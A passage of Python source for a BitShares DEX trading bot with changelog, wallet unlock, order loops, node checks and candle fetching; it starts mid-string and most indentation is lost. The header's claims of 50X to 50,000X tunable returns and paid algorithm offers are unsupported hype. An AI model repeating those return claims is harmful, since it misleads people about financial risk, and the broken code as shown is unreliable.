BitShares Core Release 2.0.180328
https://github.com/bitshares/bitshares-core/releases/tag/2.0.180328
PUBLIC NODES - 65 responding to east coast US; 2X in past 30 days
EASYDEX - Bitshares fiat gateway for USD and EUR
CITADEL - Bitshares UI and stealth wallet
PALMPAY - Chain Agnostic 3 Second Point of Sale App
MORPHIT - Fee Free app like shapeshift/blocktrades
LOCALBTS - Decentralized Local Bitshares to Fiat Reputation App
BENCH -
GRAPHENEJ - A Java library for mobile Bitshares app Developers
DEXBOT - Scalping / Market Making UI
CARBON - Multichain Mobile Wallet
STEALTH - ??? sent ??? amount to ??? BTS Transactions
BTS added to HUOBI and COINTIGER exchanges
bitsharestalk.io new chat forum
apasia, leading public node provider, acquires bitshares.org
''')
time.sleep(0)
print("\033c")
print('''
running metaNODE and EV concurrently live will use:
50kbit/s upload
600kbit/s download
<2 GB RAM
4 CPU cores at <10%
Initializing EV.py live:
3 GB RAM
100% of 1 cpu for a few minutes
''')
#===================================================================
'''
March 2018:
Possible Hack Of Third-Party Tools Affects Binance Exchange Users.
: Cointelegraph
Statement on Potentially Unlawful Online Digital Asset Platforms
: SEC.gov
I stand upon the shoulders of giants and as such,
invite you to stand upon mine.
Use my work with or without attribution;
I make no claim of "intellectual property."
My ideas are the result of countless millenia of evolution
- they belong to humanity.
: Jameson Lopp @lopp
NOTE THIS IS ALPHA RELEASE TO PUBLIC DOMAIN WITH NO WARRANTY
#
# https://www.youtube.com/watch?v=5xouOnHxYUw
# https://www.youtube.com/watch?v=jJxKXOTNXjc
#
# Rated R Under 17 NOT Admitted Without Parent
#
# My liability is ZERO; "this script licenced: don't be a bitch^TM"
#
# WTFPLv0 March 1765
#
use this, get lambo, deposit 7.777% skriptbunny tithing here:
(BTS) litepresence1
(BTC) 374gjPuhokrWj8KJu8NnMBGzpbHWcVeE1k
#
# 0.05 BTC each for AI tuned to last 365 days of any alt/btc pair
# 1 BTC each for machine optimized algo for top 100 alt/btc pair
# !@#$%^&*()!@#$%^&*()!@#$%^&*()!@#$%^&*()!@#$%^&*()!@#$%^&*()
# this algo can be tuned to between:
# 50X and 50,000X
# in BOTH currency and asset terms
# for ANY* crypto-crypto pair, over past 365 days of data
# !@#$%^&*()!@#$%^&*()!@#$%^&*()!@#$%^&*()!@#$%^&*()!@#$%^&*()
# litepresence @ pastecoin.com for sales
# finitestate@tutamail for inquiries
#
########################
#
# THE DESTROYER,
# litepresence - 2018
#
'''
#===================================================================
''' FEATURES v0.00000001 alpha release March 8, 2018'''
#===================================================================
'''
ALT/BTC data from cryptocompare.com as signal
Bitshares DEX open.ALT/open.BTC for trading
- Play simple effective 4 state 50 day cross
- uses live 2h arrays to generate moving averages
- ma1xma2 is about 17x50 day simple moving average cross
- cross plus +/- threshold changes state logic from bull to bear
- Bull Logic
buy 17 day support
sell 17 day x ~1.5 selloff
- Bear logic
sell 17 day resistance
buy 17 day x ~0.75 despair
- dynamic stoploss upon market shift
- approximately 7-20 day trade frequency depending upon pair
- announces machine state on plot
- Make Markets, Close Margins, Support Trends
- Iceberg entry and exit
- Bot runs local
- Backtest Engine Included
- Maintains storage from backtest to live session
'''
#===================================================================
''' FEATURES v0.00000002 alpha April 1, 2018 '''
#===================================================================
'''
Rogue Node Immunity:
A background daemon process maintains a list of low latency nodes
for buy/sell/cancel/orders ops in a text file
distributed exchange prices and orderbook are verified and curated
using multinode statistical approach with daemon processes
open orders are checked in triplicate on multiple nodes
dex() definitions have been upgraded after consultation with
Bitshares core developers and node admin
Move to github:
https://github.com/litepresence/extinction-event
New MODES:
SALES mode backtest only plots buy/sell actions; no state machine
LATENCY mode connect to all nodes and reports on latency
PAPER mode runs live, but does not trade
'''
#===================================================================
''' FEATURES v0.00000003 dare I say beta April 20, 2018'''
#===================================================================
'''
- microDEX.py was created to monitor EV.py in realtime.
- solid doubletime week live testing and debugging EV.py afterwards
- completely reworked all dex() calls
- reconnect() is a thing - client side wss handshake verification
- simplified scalp(), it works, enjoy
- do what I say, when I say, and announce when done: LIVE $$$ DEX'd
- new mode TEST ORDERS
- generates EV_log.py microDEX_log.py with stacktrace + buy/sell
- new easy install to virtual environment by @sschiessl
- with microDEX multinode animation and EV.py statistical curation
user and bots have VIP seats on public DEX network
'''
#===================================================================
''' FEATURES v0.00000004 beta-alt-alt-meta May 23, 2018'''
#===================================================================
'''
- metaNODE
- data curation for public database calls
- stand alone app independently watches full public network
- performs statistical analysis on data feeds
- maintains whitelisted nodes list
- acts as 'monit' type duplex watchdog to EV
- dexBOT collaboration
- metaNODE framework built to work with other bot applications
- funding earmarked for metaNODE implementation into dexBOT
- altcoin-altcoin trading via btc common base
- ie simulated STEEM:BTS pair historic backtest data
'''
#===================================================================
''' DEPENDENCIES'''
#===================================================================
'''
python 3
numpy
tkinter
matplotlib
pybitshares
*h/t @ cryptocompare.com w/ 2000+ altcoin pairs of market data
**h/t to crew at bitshares dev and node admin telegram
'''
def version():
global VERSION
#===================================================================
VERSION = 'EXTINCTION EVENT v0.00000005 beta-alt-alt-meta'
#===================================================================
print ('Python3 and Linux Required; your system:', sys.version.split(' ')[0], sys.platform)
sys.stdout.write('\x1b]2;' + VERSION + '\x07')
print('')
print(VERSION)
print('')
# USER CONTROLS
# ======================================================================
def tune_install(): # Basic User Controls
global CURRENCY, ASSET, MA1, MA2
global SELLOFF, SUPPORT, RESISTANCE, DESPAIR
global MIN_CROSS, MAX_CROSS, BULL_STOP, BEAR_STOP
global DPT, ROI, APY
global METHOD
APY = DPT = ROI = 1.0
METHOD = 0
#===================================================================
CURRENCY = "BTC"
ASSET = "BTS"
MA1 = 10
MA2 = 50
SELLOFF = 2
SUPPORT = 1
RESISTANCE = 1
DESPAIR = 0.75
MIN_CROSS = 1
MAX_CROSS = 1
BULL_STOP = 1
BEAR_STOP = 1
def control_panel(): # Advanced User Controls
global LIVE, CURRENCY, ASSET, MA1, MA2, MA3, MA4, SCALP_PIECES
global MIN_MARGIN, TICK, TICK_TIMING, TICK_MINIMUM
global CANDLE, START_ASSETS, START_CURRENCY, ORDER_TEST
global ANIMATE, STORAGE_RESET, CURRENCY_STOP, MAX_CURRENCY
global LIVE_PLOT_DEPTH, BELL, FORCE_ALPHA, PAPER, LATENCY
global DEPTH, BACKTEST, PAIR, MAX_ASSETS, SALES, SCALP_FUND
global RESOLUTION, OPTIMIZATIONS, MARKET_CROSS, OPTIMIZE, SCALP
global MANUAL_OVERRIDE, MANUAL_BUY, MANUAL_SELL, MIN_AMOUNT
# optimizer
RESOLUTION = 20
OPTIMIZATIONS = 10000
# backtest
START_ASSETS = 0
START_CURRENCY = 1
# initial backtest market state (True is "BULL")
MARKET_CROSS = True
# max percent may invest in:
# 100 = "all in" ; 10 = "10 percent in"
# to let bot do its thing with full bank use 100, 100
MAX_ASSETS = 100
MAX_CURRENCY = 100
# minimum order size in asset terms
MIN_AMOUNT = 0.01
# scalp thresholds
# ENTER OWN RISK &&&&
SCALP = True # maintain market maker iceberg margins
SCALP_PIECES = 4 # number of pieces to break up scalp orders
SCALP_FUND = 0.050 # 0.010 = 1% of holdings reserved for scalping
MIN_MARGIN = 0.025 # about 0.030
MA3 = 0.500 # about 0.500
MA4 = 0.166 # about 0.166
# force buy/sell thresholds manually
MANUAL_OVERRIDE = False
MANUAL_BUY = SATOSHI
MANUAL_SELL = ANTISAT
# Manual Override Alpha State when live
FORCE_ALPHA = False # Options: ( False, 'BULL', 'BEAR' )
# hft timing in seconds
TICK = 300
TICK_TIMING = 51
TICK_MINIMUM = 30
# backtest
ANIMATE = False
STORAGE_RESET = False
CURRENCY_STOP = False
# live window
LIVE_PLOT_DEPTH = 86400 # 86400 = 1 day
BELL = False # sound linux alarm when tick fails
# constants
CANDLE = 86400
# 0 1 2 3 4 5 6
OPTIMIZE = BACKTEST = PAPER = LIVE = SALES = LATENCY = ORDER_TEST = False
if MODE == 0:
OPTIMIZE = True
if MODE == 1:
BACKTEST = True
OPTIMIZATIONS = 0
if MODE == 2:
PAPER = True
MAX_ASSETS = 0
MAX_CURRENCY = 0
if MODE == 6:
ORDER_TEST = True
MAX_ASSETS = 0
MAX_CURRENCY = 0
if MODE in [2, 3, 6]:
LIVE = True
CANDLE = 7200
OPTIMIZATIONS = 0
print(('BOT MAY SPEND: ', MAX_ASSETS, 'PERCENT CURRENCY'))
print(('BOT MAY LIQUIDATE: ', MAX_CURRENCY, 'PERCENT ASSETS'))
print('')
print('gathering 2h candle data...')
if MODE == 4:
BACKTEST = True
SALES = True
OPTIMIZATIONS = 0
if MODE == 5:
LATENCY = True
DEPTH = int(max(MA1, MA2) * (86400 / CANDLE) + 50)
PAIR = ('%s_%s' % (CURRENCY, ASSET))
# BITSHARES DEX TRADING API
# ======================================================================
def keys_install(): # Bitshares Keys
global BitCURRENCY, BitASSET, ACCOUNT, PASS_PHRASE
global BitPAIR, MARKET, CHAIN, MODE, USERNAME, ID, LATENCY_LOOP
ID = '4018d7844c78f6a6c41c6a552b898022310fc5dec06da467ee7905a8dad512c8'
MODE = 999
print('0:OPTIMIZE, 1:BACKTEST, 2:PAPER, 3:LIVE, 4:SALES, 6: TEST ORDERS')
while MODE not in [0, 1, 2, 3, 4, 6]:
MODE = int(input('TRADING MODE: '))
print('')
if MODE == 6:
print('WARNING:')
print('This mode will repeatedly LIVE TEST buy/sell/cancel 0.1 assets on 20% spread.')
print('Monitor with microDEX.py')
print('')
if CURRENCY in ['BTS', 'USD', 'CNY']:
BitCURRENCY = CURRENCY
else:
BitCURRENCY = 'GDEX.' + CURRENCY
if ASSET in ['BTS', 'USD', 'CNY']:
BitASSET = ASSET
else:
BitASSET = 'OPEN.' + ASSET
BitPAIR = BitASSET + ":" + BitCURRENCY
if MODE in [2, 3, 6]:
nodes = nodes_fetch()
shuffle(nodes)
try:
USERNAME = input(' account: ')
print('')
print('accessing account...')
print('')
ACCOUNT = Account(USERNAME,
bitshares_instance=BitShares(nodes))
except Exception as ex:
print (type(ex).__name__)
sys.exit()
if MODE in [3, 6]:
print('DO NOT ENTER PASSWORD WITHOUT READING, UNDERSTANDING,')
print('AND TAKING PERSONAL RESPONSIBILITY FOR THE CODE')
print('')
PASS_PHRASE = getpass(prompt=' pass phrase: ')
else:
PASS_PHRASE = ''
MARKET = Market(BitPAIR, bitshares_instance=BitShares(nodes), mode='head')
if MODE in [3, 6]:
try:
MARKET.bitshares.wallet.unlock(PASS_PHRASE)
print('')
print('AUTHENTICATED')
time.sleep(1)
print("\033c")
except Exception as ex:
print (type(ex).__name__)
sys.exit()
CHAIN = Blockchain(bitshares_instance=BitShares(nodes), mode='head')
ACCOUNT = MARKET = CHAIN = 0
def reconnect( # client side, validate wss handshake
BitPAIR, USERNAME, PASS_PHRASE):
# create fresh websocket connection
i = 0
while True:
try:
time.sleep(0.05 * i ** 2)
i += 1
print(time.ctime(), 'connecting, attempt:', i)
# fetch fresh nodes list from subprocess and shuffle it
'*************************************'
metaNODE = Bitshares_Trustless_Client()
'*************************************'
nodes = metaNODE['whitelist']
shuffle(nodes)
node = nodes[0]
# create a temporary handshake to confirm good node
def chain_test(node, num):
try:
chain = Blockchain(
bitshares_instance=BitShares(node, num_retries=0), mode='head')
num.value = 1
except:
pass
num = Value('i', 0)
p = Process(target=chain_test, args=(node, num,))
p.daemon = False
p.start()
p.join(6)
if num.value == 0:
raise ValueError('reconnect timed out')
# create handshake
chain = Blockchain(
bitshares_instance=BitShares(node, num_retries=0), mode='head')
market = Market(BitPAIR,
bitshares_instance=BitShares(node, num_retries=0), mode='head')
account = Account(USERNAME,
bitshares_instance=BitShares(node, num_retries=0))
current_block = chain.get_current_block_num()
start = time.time()
blocktimestamp = chain.block_timestamp(current_block)
ping = time.time() - start
block_latency = start - blocktimestamp
# Confirm the connection is good
if ping > 2:
raise ValueError('ping > 2')
if block_latency > 5:
raise ValueError('block latency > 5')
if chain.get_network()['chain_id'] != ID:
raise ValueError('Not Mainnet Chain')
if float(market.ticker()['latest']) == 0:
raise ValueError('ZERO price')
break
except Exception as e:
msg = msg_(e) + str(node)
race_append(doc='EV_log.txt', text=msg)
print(time.ctime(), type(e).__name__, e.args, node)
continue
try:
market.bitshares.wallet.unlock(PASS_PHRASE)
except:
pass
print(time.time(), node, market, str(chain).split(' ')[-1])
return account, market, node, chain
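# ----------------------------------------------------------------------
# Illustrative sketch: reconnect() above vets each candidate node by
# running the first handshake in a child Process and treating a join()
# timeout as failure, so a hung websocket can never stall the bot. The
# same timed-probe pattern in isolation; probe() is a hypothetical
# stand-in for the pybitshares Blockchain() call and must set
# flag.value = 1 on success.
from multiprocessing import Process, Value

def _example_timed_probe(probe, args=(), timeout=6):
    '''Return True only if probe(*args, flag) signals success in time.'''
    flag = Value('i', 0)
    child = Process(target=probe, args=args + (flag,))
    child.daemon = True
    child.start()
    child.join(timeout)
    if child.is_alive():
        child.terminate()
    return bool(flag.value)
# ----------------------------------------------------------------------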
def dex_auth(command, amount=ANTISAT, price=None, expiration=ANTISAT):
# insistent timed process wrapper for dex_auth2()
# covers all buy/sell/cancel pybitshares authenticated requests
# if command does not execute in time: kill process, start anew
# serves to force disconnect websockets if done; also if hung
# signal.value is switched to 0 at end of dex_auth2()
timeout = 60
signal = Value('i', 1)
i = 0
while signal.value:
i+=1
print('')
print('pybitshares authentication attempt:', i)
process = Process(target=dex_auth2,
args=(signal, command, amount, price, expiration))
process.daemon = False
process.start()
process.join(timeout)
print('pybitshares authentication terminated')
print('')
watchdog()
def dex_auth2(signal, command, amount, price, expiration):
attempt = 1
# BUY/SELL/CANCEL OPS
if amount > MIN_AMOUNT:
if command == 'buy':
# buy relentlessly until satisfied or currency exhausted
print(('Bitshares API', command, satoshi_str(amount), 'at', satoshi_str(price)))
while 1:
try:
time.sleep(0.05 * attempt ** 2)
if attempt > 1:
print('buy attempt:', attempt)
# Gather curated public data
'*************************************'
metaNODE = Bitshares_Trustless_Client()
'*************************************'
last = metaNODE['last']
currency = metaNODE['currency_balance']
assets = metaNODE['asset_balance']
# Authenticate via pybitshares
account, market, node, chain = reconnect(BitPAIR, USERNAME, PASS_PHRASE)
# Final check, buy no more than 110% market price
if (price is None) or (price > 1.1*last):
price = 1.1*last
# Save last bitshare for fees
if BitCURRENCY == 'BTS':
currency -= 1
# No negative currency
currency = max(0,currency)
# means to buy is currency in hand divided by order price
means = currency/price
# order amount no more than 99.8% means
if amount > 0.998 * means:
print('not enough currency')
amount = 0.998 * means
# if order amounts to more than dust, place order
if amount > MIN_AMOUNT:
print(('order final check', command, satoshi_str(amount), 'at', satoshi_str(price)))
print('Currency: ', currency, 'Means: ', means)
print(market, price, amount, expiration)
details = (market.buy(price, amount, expiration))
print (details)
break
except Exception as e:
if 'balance' in str(e).lower():
print('Insufficient Balance')
break
else:
msg = msg_(e)
msg += ('\n\n' + str(attempt) + ' ' + ' BUY FAILED, RECONNECTING '
+ str(node) + ' ' + str(price) + ' ' + str(amount))
race_append(doc='EV_log.txt', text=msg)
print("buy attempt %s failed" % attempt)
attempt += 1
if attempt > 10:
diagnostics(level=[1,2,3])
print(("buy attempt %s WARN: ABORTED" % attempt))
break
continue
else:
print('no currency to buy')
break
if command == 'sell':
# sell relentlessly until satisfied or assets exhausted
print(('Bitshares API', command, satoshi_str(amount), 'at', satoshi_str(price)))
while 1:
try:
time.sleep(0.05 * attempt ** 2)
if attempt > 1:
print('sell attempt:', attempt)
# Gather curated public data
'*************************************'
metaNODE = Bitshares_Trustless_Client()
'*************************************'
last = metaNODE['last']
currency = metaNODE['currency_balance']
assets = metaNODE['asset_balance']
# Authenticate via pybitshares
account, market, node, chain = reconnect(BitPAIR, USERNAME, PASS_PHRASE)
# Final check, sell no less than 90% market price
if (price is None) or (price < 0.9*last):
price = 0.9*last
# Final check, amount no more than 99.8% assets
if BitASSET == 'BTS':
assets -= 1 # Save last bitshare for fees
assets = max(0,assets)
if amount > 0.998 * assets:
print('not enough assets')
amount = 0.998 * assets
# Final Check, min bid size
if amount > MIN_AMOUNT:
print(('order final check', command, satoshi_str(amount), 'at', satoshi_str(price)))
details = (market.sell(price, amount, expiration))
details = str(details)
print (details)
race_append(doc='EV_log.txt', text=details)
break
except Exception as e:
if 'balance' in str(e).lower():
print('Insufficient Balance')
break
else:
msg = msg_(e)
msg += ('\n\n' + str(attempt) + ' ' + ' SELL FAILED, RECONNECTING '
+ str(node) + ' ' + str(price) + ' ' + str(amount))
race_append(doc='EV_log.txt', text=msg)
print(("sell attempt %s failed" % attempt))
attempt += 1
if attempt > 10:
diagnostics(level=[1,2,3])
print(("sell attempt %s WARN: ABORTED" % attempt))
break
continue
else:
print('no assets to sell')
break
else:
print('buy/sell request under MIN_AMOUNT')
if command == 'cancel':
# cancel repeatedly until we arrive at the server with nothing to cancel
print(('Bitshares API', command))
i = 0
while 1:
try:
i+=1
time.sleep(0.05 * i ** 2)
'*************************************'
metaNODE = Bitshares_Trustless_Client()
'*************************************'
orders = metaNODE['orders']
break
except:
continue
while len(orders):
time.sleep(0.05 * attempt ** 2)
if attempt > 1:
print('cancel attempt:', attempt)
try:
account, market, node, chain = reconnect(BitPAIR, USERNAME, PASS_PHRASE)
'*************************************'
metaNODE = Bitshares_Trustless_Client()
'*************************************'
orders = metaNODE['orders']
i += 1
print((len(orders), 'open orders to cancel'))
order_list = []
for order in orders:
order_list.append(order['orderNumber'])
details = market.cancel(order_list)
print (details)
except Exception as e:
msg = msg_(e)
race_append(doc='EV_log.txt', text=msg)
print(("cancel attempt %s failed" % attempt))
attempt += 1
if attempt > 10:
diagnostics(level=[1,2,3])
print ('cancel aborted')
continue
print('no orders to cancel')
signal.value = 0
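# ----------------------------------------------------------------------
# Illustrative sketch: dex_auth() above keeps relaunching dex_auth2() in
# a fresh Process until the worker clears the shared signal, so a hung
# buy/sell/cancel call is simply abandoned and retried with a new
# websocket. Minimal form of that insistent wrapper; worker() is any
# hypothetical callable that sets signal.value = 0 when it finishes.
from multiprocessing import Process, Value

def _example_insistent(worker, timeout=60):
    '''Re-run worker(signal) in a child process until signal clears.'''
    signal = Value('i', 1)
    while signal.value:
        child = Process(target=worker, args=(signal,))
        child.daemon = False
        child.start()
        child.join(timeout)
        if child.is_alive():          # worker hung past the timeout
            child.terminate()
# ----------------------------------------------------------------------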
def nodes_fetch():
metaNODE = Bitshares_Trustless_Client()
return metaNODE['whitelist']
# TEXT PIPE
# ======================================================================
def Bitshares_Trustless_Client(): # creates metaNODE dictionary
# Include this definition in your script to access metaNODE.txt
# Deploy your bot script in the same folder as metaNODE.py
i = 0
while True:
try:
time.sleep(0.05 * i ** 2)
i += 1
with open('metaNODE.txt', 'r') as f:
#diagnostics(level=[1])
ret = f.read()
f.close()
try:
metaNODE = literal(ret)
break
except:
pass
try:
ret = ret.split('}')[0] + '}'
metaNODE = literal(ret)
break
except:
pass
except Exception as e:
msg = str(type(e).__name__) + str(e.args)
msg += ' Bitshares_Trustless_Client()'
print(msg)
diagnostics(level=[1,2,3])
try:
f.close()
except:
pass
pass
finally:
try:
f.close()
except:
pass
return metaNODE
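# ----------------------------------------------------------------------
# Usage sketch: Bitshares_Trustless_Client() returns the dictionary that
# metaNODE.py maintains in metaNODE.txt. The keys pulled below ('last',
# 'whitelist', 'currency_balance', 'asset_balance') are the ones this
# script reads elsewhere; any other keys are up to metaNODE.py.
def _example_read_metanode():
    '''Pull a few commonly used values from the curated metaNODE feed.'''
    metaNODE = Bitshares_Trustless_Client()
    last_price = float(metaNODE['last'])
    nodes = metaNODE['whitelist']
    currency = float(metaNODE['currency_balance'])
    assets = float(metaNODE['asset_balance'])
    return last_price, nodes, currency, assets
# ----------------------------------------------------------------------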
def race_read(doc=''): # Concurrent Read from File Operation
i = 0
while True:
try:
time.sleep(0.05 * i ** 2)
i += 1
with open(doc, 'r') as f:
ret = f.read()
f.close()
try:
ret = literal(ret)
except:
pass
try:
ret = ret.split(']')[0] + ']'
ret = literal(ret)
except:
pass
try:
ret = ret.split('}')[0] + '}'
ret = literal(ret)
except:
if '{' in ret:
ret = {}
else:
ret = []
break
except Exception as e:
msg = str(type(e).__name__) + str(e.args)
msg += ' race_read()'
print(msg)
try:
f.close()
except:
pass
continue
finally:
try:
f.close()
except:
pass
return ret
def race_write(doc='', text=''): # Concurrent Write to File Operation
text = str(text)
i = 0
while True:
try:
time.sleep(0.05 * i ** 2)
i += 1
with open(doc, 'w+') as f:
f.write(text)
f.close()
break
except Exception as e:
msg = str(type(e).__name__) + str(e.args)
msg += ' race_write()'
print(msg)
try:
f.close()
except:
pass
continue
finally:
try:
f.close()
except:
pass
def race_append(doc='', text=''): # Concurrent Append to File Operation
text = '\n' + str(time.ctime()) + ' ' + str(text) + '\n'
i = 0
while True:
time.sleep(0.05 * i ** 2)
i += 1
if i > 10:
break
try:
with open(doc, 'a+') as f:
f.write(text)
f.close()
break
except Exception as e:
msg = str(type(e).__name__) + str(e.args)
msg += ' race_append()'
print(msg)
try:
f.close()
except:
pass
continue
finally:
try:
f.close()
except:
pass
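# ----------------------------------------------------------------------
# Usage sketch: race_write()/race_read() round-trip Python literals
# through a text file with retry-on-contention, which is how EV.py and
# metaNODE.py share state without a database. The filename below is
# hypothetical.
def _example_shared_state_roundtrip():
    '''Write a dict to disk and read it back as a dict.'''
    state = {'tick': 1, 'holding': True}
    race_write(doc='example_state.txt', text=state)
    return race_read(doc='example_state.txt')  # {'tick': 1, 'holding': True}
# ----------------------------------------------------------------------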
def watchdog():
identity = 0 # metaNODE:1, botscript:0
max_latency = 60
while 1:
try:
try:
with open('watchdog.txt', 'r') as f:
ret = f.read()
f.close()
ret = literal(ret)
response = int(ret[identity])
now = int(time.time())
latency = now-response
if identity == 0:
msg = str([response, now])
if identity == 1:
msg = str([now, response])
with open('watchdog.txt', 'w+') as f:
f.write(msg)
f.close()
msg = str(latency)
if latency > max_latency:
bell()
gmail()
msg += ' !!!!! WARNING: the other app is not responding !!!!!'
return msg
except Exception as e:
msg = str(type(e).__name__) + str(e.args)
print(msg)
now = int(time.time())
with open('watchdog.txt', 'w+') as f:
f.write(str([now, now]))
f.close()
break # exit while loop
except Exception as e:
msg = str(type(e).__name__) + str(e.args)
print(msg)
try:
f.close()
except:
pass
finally:
try:
f.close()
except:
pass
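# ----------------------------------------------------------------------
# Illustrative sketch: watchdog() above implements a duplex heartbeat in
# watchdog.txt, a two item list of unix timestamps. Each process reads
# the peer's stamp from its own identity index and writes the current
# time into the peer's index (the convention used above: botscript = 0,
# metaNODE = 1). The core exchange, without the retry handling:
import time
from ast import literal_eval

def _example_heartbeat(path='watchdog.txt', identity=0):
    '''Refresh our stamp and return the peer's latency in seconds.'''
    with open(path, 'r') as handle:
        stamps = literal_eval(handle.read())
    peer_stamp = int(stamps[identity])      # peer writes into our index
    now = int(time.time())
    stamps[1 - identity] = now              # we write into the peer's index
    with open(path, 'w') as handle:
        handle.write(str(stamps))
    return now - peer_stamp
# ----------------------------------------------------------------------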
# CANDLES and CEX DATA
# ======================================================================
def backtest_candles(pair, start, stop, candle): # HLOCV arrays
# gather complete dataset so only one API call is required
raw = chartdata(pair, start, stop, candle)
d = {}
d['unix'] = []
d['high'] = []
d['low'] = []
d['open'] = []
d['close'] = []
for i in range(len(raw)):
d['unix'].append(raw[i]['time'])
d['high'].append(raw[i]['high'])
d['low'].append(raw[i]['low'])
d['open'].append(raw[i]['open'])
d['close'].append(raw[i]['close'])
d['unix'] = np.array(d['unix'])
d['high'] = np.array(d['high'])
d['low'] = np.array(d['low'])
d['open'] = np.array(d['open'])
d['close'] = np.array(d['close'])
# normalize high and low data
for i in range(len(d['close'])):
if d['high'][i] > 2 * d['close'][i]:
d['high'][i] = 2 * d['close'][i]
if d['low'][i] < 0.5 * d['close'][i]:
d['low'][i] = 0.5 * d['close'][i]
return d
def slice_candles(now, data): # Window backtest arrays
# window backtest_candles() data to test each candle
d = {}
for i in range(len(data['unix'])):
if now <= data['unix'][i] < (now + CANDLE):
h = []
l = []
o = []
c = []
for j in range(DEPTH):
try:
h.append(data['high'][i - j])
l.append(data['low'][i - j])
o.append(data['open'][i - j])
c.append(data['close'][i - j])
except:
print("append failed")
pass
# print close
d['high'] = np.array(h[::-1])
d['low'] = np.array(l[::-1])
d['open'] = np.array(o[::-1])
d['close'] = np.array(c[::-1])
return d
def live_candles(pair, candle, depth): # Current HLOCV arrays
# gather latest data to a given depth
now = int(time.time())
raw = chartdata(pair, (now - (depth + 10) * candle), now, candle)
d = {}
d['unix'] = []
d['high'] = []
d['low'] = []
d['open'] = []
d['close'] = []
d['volume'] = []
for i in range(len(raw)):
d['unix'].append(raw[i]['time'])
d['high'].append(raw[i]['high'])
d['low'].append(raw[i]['low'])
d['open'].append(raw[i]['open'])
d['close'].append(raw[i]['close'])
d['volume'].append(raw[i]['volumefrom'])
d['unix'] = np.array(d['unix'][-depth:])
d['high'] = np.array(d['high'][-depth:])
d['low'] = np.array(d['low'][-depth:])
d['open'] = np.array(d['open'][-depth:])
d['close'] = np.array(d['close'][-depth:])
d['volume'] = np.array(d['volume'][-depth:])
return d
def chartdata(pair, start, stop, period):
# before sending request on to chartdata2
# allow for altcoin/altcoin pair
# (ASSET1/BTC) / (ASSET2/BTC)
# this synthetic process can introduce aberrations in the dataset
# METHOD in tune_install allows for reconstruction method control
if CURRENCY in ['BTC', 'USD', 'CNY']:
return chartdata2(pair, start, stop, period)
else:
PAIR1 = ('%s_%s' % ('BTC', ASSET))
PAIR2 = ('%s_%s' % ('BTC', CURRENCY))
dataset1 = chartdata2(PAIR1, start, stop, period)
dataset2 = chartdata2(PAIR2, start, stop, period)
minlen = min(len(dataset1), len(dataset2))
dataset1 = (dataset1)[-minlen:]
dataset2 = (dataset2)[-minlen:]
#{"time","close","high","low","open","volumefrom","volumeto"}
dataset3 = []
method = METHOD
for i in range(len(dataset1)):
print(i)
d1_h = dataset1[i]['high']
d2_h = dataset2[i]['high']
d1_l = dataset1[i]['low']
d2_l = dataset2[i]['low']
d1_o = dataset1[i]['open']
d2_o = dataset2[i]['open']
d1_c = dataset1[i]['close']
d2_c = dataset2[i]['close']
candle_time = dataset1[i]['time']
_close = d1_c/d2_c
_open = d1_o/d2_o
# in this section various methods can be entertained
# ##################################################
if method == 0: # most likely
_high = d1_h/d2_c
_low = d1_l/d2_c
if method == 1: # most unrealistic profitable
_high = d1_h/d2_l
_low = d1_l/d2_h
if method == 2:
_high = d1_h/d2_h # most conservative least profitable
_low = d1_l/d2_l
if method == 3: # halfway between 1 and 2
_high = ((d1_h+d1_c)/2) / ((d2_l+d2_c)/2)
_low = ((d1_l+d1_c)/2) / ((d2_h+d2_c)/2)
# if method == 4: # etc...
# ##################################################
_low = min(_high, _low, _open, _close)
_high = max(_high, _low, _open, _close)
volumefrom = dataset1[i]['volumefrom'] / dataset2[i]['volumefrom']
volumeto = dataset1[i]['volumeto'] / dataset2[i]['volumeto']
candle = {'time': candle_time,
'close':_close,
'high':_high,
'low':_low,
'open':_open,
'volumefrom':volumefrom,
'volumeto':volumeto}
dataset3.append(candle)
print(dataset1)
print('')
print(dataset2)
print('')
print(dataset3)
print('')
print(dataset1[0])
print('')
print(dataset2[0])
print('')
print(dataset3[0])
return dataset3
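# ----------------------------------------------------------------------
# Illustrative sketch: for an ALT/ALT pair, chartdata() rebuilds each
# candle as the ratio of two BTC-quoted candles. With METHOD == 0 the
# open/close are straight ratios, the high/low are taken against the
# denominator's close, and the result is re-ordered so low <= high.
# One candle in isolation (inputs are cryptocompare-style candle dicts):
def _example_synthetic_candle(asset_btc, currency_btc):
    '''Combine ASSET/BTC and CURRENCY/BTC candles into ASSET/CURRENCY.'''
    close_ = asset_btc['close'] / currency_btc['close']
    open_ = asset_btc['open'] / currency_btc['open']
    high_ = asset_btc['high'] / currency_btc['close']   # METHOD 0
    low_ = asset_btc['low'] / currency_btc['close']
    low_ = min(high_, low_, open_, close_)
    high_ = max(high_, low_, open_, close_)
    return {'time': asset_btc['time'], 'open': open_,
            'high': high_, 'low': low_, 'close': close_}
# ----------------------------------------------------------------------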
def chartdata2(pair, start, stop, period): # Public API cryptocompare
#{"time","close","high","low","open","volumefrom","volumeto"}
# docs at https://www.cryptocompare.com/api/
# print(('API call for chartdata %s %ss %se CANDLE %s DAYS %s' % (
# pair, start, stop, period, int((stop - start) / 86400.0))))
connected = 0
while not connected:
try:
if period in [60, 300, 900, 1800, 3600, 7200, 14400, 43200, 86400]:
uri = 'https://min-api.cryptocompare.com/data/'
if period <= 1800:
uri += 'histominute'
aggregate = period / 60.0
if 3600 <= period <= 43200:
uri += 'histohour'
aggregate = period / 3600.0
if period >= 86400:
uri += 'histoday'
aggregate = period / 86400.0
aggregate = int(aggregate)
pair_split = pair.split('_')
fsym = pair_split[1]
tsym = pair_split[0]
toTs = int(stop)
limit = int((stop - start) / float(period))
if limit > 2000:
limit = 2000
params = {'fsym': fsym, 'tsym': tsym, 'limit': 2000,
'aggregate': aggregate, 'toTs': toTs}
ret = requests.get(uri, params=params).json()
d = ret['Data']
clean_d = clean_d1 = [i for i in d if i['close'] > 0]
if (period == 7200) and ((stop - start) / 7200.0 > 1000):
toTs -= period * len(clean_d)
params = {'fsym': fsym, 'tsym': tsym, 'limit': 2000,
'aggregate': aggregate, 'toTs': toTs}
ret = requests.get(uri, params=params).json()
d = ret['Data']
clean_d2 = [i for i in d if i['close'] > 0]
clean_d = clean_d2 + clean_d1
clean_d = [i for i in clean_d if i['time'] > start]
print((len(clean_d),
(clean_d2[-1]['time'], clean_d1[0]['time']),
(clean_d1[0]['time'] - clean_d2[-1]['time'])))
print()
if len(clean_d):
return clean_d
else:
print('invalid period')
return None
except Exception as e:
msg = msg_(e)
race_append(doc='EV_log.txt', text=msg)
print (msg, 'chartdata() failed; try again...')
time.sleep(5)
pass
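# ----------------------------------------------------------------------
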